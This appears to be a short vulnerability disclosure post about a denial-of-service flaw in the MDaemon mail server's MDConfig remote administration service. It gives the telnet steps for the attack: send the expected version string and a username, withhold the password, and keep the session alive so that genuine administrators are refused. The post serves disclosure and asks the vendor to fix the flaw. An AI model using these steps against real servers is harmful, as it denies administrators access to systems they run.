MDaemon mail server for Windows comes with a utility called MDConfig to

remotely administer a MDaemon server.

To establish MDConfig connection to a MDaemon server, an administrator must

enable MDConfig server on the server machine. Connection will be established

on a predefined TCP port, by default 3002. Connection procedure is similar

to these:



--> telnet servernameORipaddress 3002

+OK domainname MDCONFIG interface ready

--> VERS {ENTER}

-ERR MDConfig v3.5.0 required   (we identify the server version here,

connection closed)



Try to connect again:



--> telnet servernameORipaddress 3002

+OK domainname MDCONFIG interface ready

--> VERS MDConfig v3.5.0 {ENTER}

+OK MDConfig v3.5.0 acceptable  (Connection established)

---> USER anyname

+OK  got it



Here just wait without giving any password. The server will be waiting until

either the correct password is entered or the inactivity timeout period

(possibly 10 minutes). During this period you can press ENTER to avoid

timeout problem. Inactitivity time will be reset back to 10 minutes and

restart countdown.



OK, the problem or the possible DOS attack on MDConfig is here. Now open

another telnet session and try to connect. The connection will be refused.



So,  malicious user can esatablish a connection and maintain the link and

any MDaemon administrator who try remote administer the server will be

refused connection.



Isn't it bit annoying and ALT+N must take care of it?



Riyad

Sri Lanka